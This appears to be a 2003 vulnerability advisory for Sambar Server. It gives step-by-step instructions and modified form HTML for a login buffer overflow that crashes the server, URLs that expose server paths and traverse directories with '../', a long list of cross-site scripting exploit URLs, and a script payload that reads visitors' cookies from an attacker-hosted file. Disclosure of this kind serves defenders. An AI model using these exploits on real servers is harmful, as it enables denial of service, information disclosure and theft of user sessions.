6th Apr 2003 [SBWID-6108]
COMMAND
Sambar Server buffer overflow and sample cgi / script vulnerabilities
SYSTEMS AFFECTED
All Sambar Server systems with sysuser login included (buffer overflow)
Sambar 5.3 and prior (script vulns)
PROBLEM
1 Buffer overflow
=
Lorenzo Manuel Hernandez Garcia-Hierro [[email protected]]
[http://www.lorenzohgh.com] found :
This vulnerability is caused because the form that the Sambar Server
demon doesn't examinates the buffer and sizes of the login form
transfer, the only protection for the server is the values at the form
in the html code ( the max value of the RCPassword input) , this can be
a vulnerability if the server is public-exposed and the directories of
the sysuser is known.
METHOD TO XPLOIT IT:
You must be sure and known the true path (at sambar root like c:\sambar
) of the sysuser login form, now follow this easy steps:
1st: go to the webserver sysuser login form path , like
http://localhost/sysuser/index.stm (you must specify the index.stm for
the RPC called locally trough index.stm ).
2nd: copy and paste the code of the form ( total page ) and paste it in
a blank text field , rename to a something.html .
3th: put in the correct fields the http://localhost or url for your
sambar server installation ,this is for the form and images , of
course, the form must be connect to the correct url address of the
server script. The code goes like here:
[FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation.
[INPUT TYPE=hidden NAME="onfailure"
VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more buffer over flow like to a cgi script (this can be a DoS attack
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *This is the problem!*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]
4th: now you can try to refresh and login , use a valid user and
password if you want to prove the vulnerability number one or go to the
6th step!
5th: now you must push on the submit button , wait , and if you are
running the server on your computer the server pick up and becomes
unstable , if you continue sending this attemps the server must be
restarted or the computer restarted during the attack!.
6th: the second vulnerability is the bffer overflow in form fields of
password ( you can learn more about this in the advisory of Allaire
'ColdFusion Buffer OverFlow in form fields') , you can insert more than
million of characters and submit it but you must edit the form code in
your computer:
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this to...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than hundred thousand characters"]
and.......... 7th: push on submit and the server pick up too!
2 Scripts
=
Gr�gory Le Bras aka GaLiaRePt [http://www.Security-Corporation.com]
says :
http://www.security-corp.org/index.php?ink=4-15-1
http://www.security-corporation.com/index.php?id=advisories&a=012-FR
� Path Disclosure :
===================
Sambar default's installation of the CGI bin directory contains a
testcgi.exe and a environ.pl that allows remote users to view
information regarding the operating system and web server's directory.
These vulnerabilities can be triggered by a remote user submitting a
specially crafted HTTP request.
- Exploits :
http://[target]/cgi-bin/environ.pl
http://[target]/cgi-bin/testcgi.exe
Will produce the following output:
- environ.pl :
--------------
Sambar Server CGI Environment Variables
GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:
- testcgi.exe :
---------------
Test CGI ... Version 1.00 [ build date 8-03-97 ]
QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE
� Directory Disclosure :
========================
Other security vulnerabilities was found in Sambar which allow an
attacker to reveal the content of the files and the directories on the
web server, even if it should not be revealed.
These vulnerabilities can be simply exploited by requesting a specially
crafted URL utilizing iecreate.stm and ieedit.stm application with a
'../' appended.
- Exploits :
http://[target]/sysuser/docmgr/iecreate.stm?template=../
http://[target]/sysuser/docmgr/ieedit.stm?url=../
� Cross Site Scripting :
========================
Many exploitable bugs was found on Sambar Server which cause script
execution on client's computer by following a crafted url.
This kind of attack known as "Cross-Site Scripting Vulnerability" is
present in many section of the web site, an attacker can input
specially crafted links and/or other malicious scripts.
- Exploits :
http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]
http://[target]/netutils/whodata.stm?sitename=[hostile_code]
http://[target]/netutils/findata.stm?user=[hostile_code]
http://[target]/netutils/findata.stm?host=[hostile_code]
http://[target]/isapi/testisa.dll?check1=[hostile_code]
http://[target]/cgi-bin/environ.pl?param1=[hostile_code]
http://[target]/samples/search.dll?query=[hostile_code]&logic=AND
http://[target]/wwwping/index.stm?wwwsite=[hostile_code]
http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456
http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]
http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]
http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]
http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]
http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]
http://[target]/cgi-bin/testcgi.exe?[hostile_code]
- An other Cross Site Scripting can be exploited with a remote file
where's include the hostile code like this :
http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm
The hostile code could be :
[script]alert("Cookie="+document.cookie)[/script]
(open a window with the cookie of the visitor.)
(replace [] by <>)
SOLUTION
None yet